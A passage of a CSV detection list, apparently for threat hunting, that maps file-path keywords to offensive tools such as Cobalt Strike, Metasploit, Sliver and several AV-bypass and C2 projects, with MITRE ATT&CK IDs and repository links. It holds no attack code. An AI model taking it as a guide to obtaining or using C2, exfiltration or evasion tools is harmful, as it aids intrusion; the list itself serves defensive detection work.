TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*/build/encrypted_shellcode*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/build/formatted_shellcode*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/build/shellcode*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/BuildBOFs/*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*/burp/releases/community/latest*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/burp-api/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/burp-Dirbuster*,offensive_tool_keyword,dirbuster,Dirbuster plugin for Burp Suite,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/vulnersCom/burp-Dirbuster,1,1,N/A,N/A,1,71,28,2017-02-22T08:31:32Z,2017-02-22T08:24:05Z -*/burpee.py*,offensive_tool_keyword,cobaltstrike,Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CodeXTF2/Burp2Malleable,1,1,N/A,10,10,320,32,2023-04-06T15:24:12Z,2022-08-14T18:05:39Z -*/BurpExtender.java*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0010 - TA0007 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/burp-proxy*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/BurpSuite-collections*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*/BUYTHEAPTDETECTORNOW*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/byakugan.cpp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/byakugan.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bypass.vbs*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Bypass/payloads*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/bypass_mod/loader*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*/BypassAV/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike plugin for quickly generating anti-kill executable files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/hack2fun/BypassAV,1,1,N/A,10,10,830,126,2020-07-19T15:46:54Z,2020-02-17T02:33:14Z -*/bypassAV-1/*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*/BypassCredGuard.git*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*/BypassFramework.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/bypassuac/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/C2/Beacon/*.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/c2/c2.go*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/C2/c2.go*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*/C2/Http/*.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/C2/server.py*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*/C2/SmbListener.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/c2/tcp-stager.*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/c2_code/*.html,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/c2_code/server*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/C2_Profiles/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/C2_Server.git*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*/c2_server/resources*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/c2_test.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/C2concealer*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,1,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*/C2concealer*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/C2Frame.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/C2Manager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/c2profile.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/c2profile.go*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 